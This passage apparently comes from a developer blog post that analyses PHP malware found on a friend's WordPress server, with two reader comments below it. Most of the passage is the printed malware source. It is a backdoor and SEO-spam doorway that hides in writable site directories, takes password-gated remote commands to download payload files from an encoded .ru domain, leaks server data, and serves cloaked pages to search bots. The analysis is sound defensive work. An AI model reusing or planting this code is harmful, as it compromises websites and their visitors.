        header("Location: $nexturl");
    }
    return array($buf,$ct);

}

function get_db_path(){

    if (stristr(PHP_OS,"win")){
        return sys_get_temp_dir();
    }

    $default_dirs = array(
        'wp-includes/SimplePie/Content',
        'wp-includes/js/tinymce/plugins',
        'wp-content/plugins/akismet/_inc/img',
        'administrator/components/com_media/views/images',
        'libraries/cms/html/language',
        'media/editors/tinymce/js/plugins',
        'tmp',
        'wp-content/uploads'
    );

    foreach ($default_dirs as $d) if (is_dir($d) && is_writable($d)) return ($d);

    $current_dir = opendir('.');
    while ($dir = readdir($current_dir)) if (!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir)) return ($dir);
    closedir($current_dir);

    if (is_writable('.')) return ('.');

    $tmp_dir = sys_get_temp_dir();
    if (is_dir($tmp_dir) && is_writable($tmp_dir)) return $tmp_dir;

    return ".";

}




$content="";
$x=get_val("pppp_check");

$md5pass="e5e4570182820af0a183ce1520afe43b";

$host=strtolower(@$_SERVER["HTTP_HOST"]);
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);$urx=$host.$uri;$md5urx=md5($urx);


$xmd5="/.".$md5host."/";

$cfile="emoji1.png";

if (!@file_exists(".".$xmd5.$cfile)){
    $tmppath=get_db_path();
}else{
    $tmppath=".";
}

$tmppath=$tmppath.$xmd5;@mkdir($tmppath);


$configs=$tmppath.$cfile;
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";

@ini_set('memory_limit','1600M');


$domain=base64_decode("aW5kaWthdGVpdC5ydQ==");

$p="";
if ($x!="")$p=md5(@base64_decode(get_val("p")));

if (($x!="")&&($p==$md5pass)){

    if ($x=="2"){
        echo "###UPDATING_FILES###\n";
        $ur="http://".$domain."/images/".$md5host."/";
        list($buf1,$t)=@curly_page_get($ur."emoji1.png");@file_put_contents($configs,$buf1);
        list($buf1,$t)=@curly_page_get($ur."metaicons.jpg");@file_put_contents($bd,$buf1);
        list($buf1,$t)=@curly_page_get($ur."wp-themesall.gif");@file_put_contents($templ,$buf1);
        echo "###UPDATED###\n";
        exit;
    }


    if ($x=="4"){
        echo "###WORKED###\n";exit;
    }
    if ($x=="5"){
        $cf=array();
        if (@file_exists($configs)){
            $cf=@unserialize(@base64_decode(@file_get_contents($configs)));
        }

        $out=array(
                        'cf' => $cf,
                        'server' => $_SERVER,
                        'file' => __FILE__,
                        'configfile' => $configs,
                        'db_file_size' => is_file($bd) ? filesize($bd) : 0,
                        'template_file_size' => is_file($templ) ? filesize($templ) : 0,
                    );
        echo base64_encode(serialize($out));

        exit;

    }


}else{

    $cf=array();
    if (@file_exists($configs)){
        $cf=@unserialize(@base64_decode(@file_get_contents($configs)));
    }

    if (@isset($cf[$md5urx])){
        $bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
        if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
        if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
        $off=$cf[$md5urx]+0;
        $template=@base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f));@fclose($f);$info=unserialize(base64_decode($buf));
        $keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
        if ($bot) {
            if (isset($info["contenttype"])){$contenttype=@base64_decode($info["contenttype"]);$types=explode("\n",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}

            if (isset($info["isdoor"])){

                if (isset($info["standalone"])){
                    $doorcontent=base64_decode($text);
                    echo $doorcontent;exit;
                }else{
                    if ((isset($info["nr"]))&&(is_array($info["nr"]))){
                        foreach($info["nr"] as $mark => $repl){
                            $template=str_replace($mark,$repl,$template);
                        }
                    }else{
                        $template=str_replace("%text%",$text,$template);
                        $template=str_replace("%title%",$title,$template);
                        $template=str_replace("%description%",$description,$template);
                        $template=str_replace("%uckeyword%",$uckeyword,$template);
                        $template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);

                        foreach($inside_links as $i => $link){
                            $template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
                        }
                    }

                    echo $template;exit;
                }
            }else{

                list($buf,$ct)=get_proxy_page();

                if (stristr($ct,"text/html")){
                    $rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
                    $links=$info["links_a"];
                    $buf=change_page_regex($buf,$links,$rega,$resa);

                    $regp='/(.{30}\<\/p\>)/is';$resp=1;
                    $links=$info["links_p"];
                    $buf=change_page_regex($buf,$links,$regp,$resp);
                }

                echo $buf;exit;
            }



        }
        if ($se) {
            if (isset($info["isdoor"])){
                list($buf,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
            }else{
                list($buf,$ct)=get_proxy_page();
            }
            echo $buf;exit;
        }
    }else{

        list($buf,$ct)=get_proxy_page();
        echo $buf;exit;
    }

}


Enter fullscreen mode Exit fullscreen mode

Immediately, I notice $domain which is a base64 encoded string, which when decoded gives:

indikateit.ru

I'm guessing this is the server which the allegedly malcious scripts post information to.

This decoded base64 script references $_COOKIE, $_SERVER & $_REQUEST, the same variables which the first file referenced.

Update: Upon googling some of the base64 decoded code, I found a link on UnPHP of someone who deobfuscated similar code

However, the domain in this one was hlemovka.ru

Discussion (2)

Collapse
phantas0s profile image
Matthieu Cneude

Nice job!

I've a question: how does this code ended up on the server of your friend?

For now, my conclusion is: don't use Wordpress. I've so many requests on my server trying to connect to the Wordpress admin (even if my website is not a wordpress), it's insane.

Collapse
rat profile image
🐁 Author

Thanks for the comment.

My friend thinks it may be to do with his comment fields: potentially not sanitizing inputs.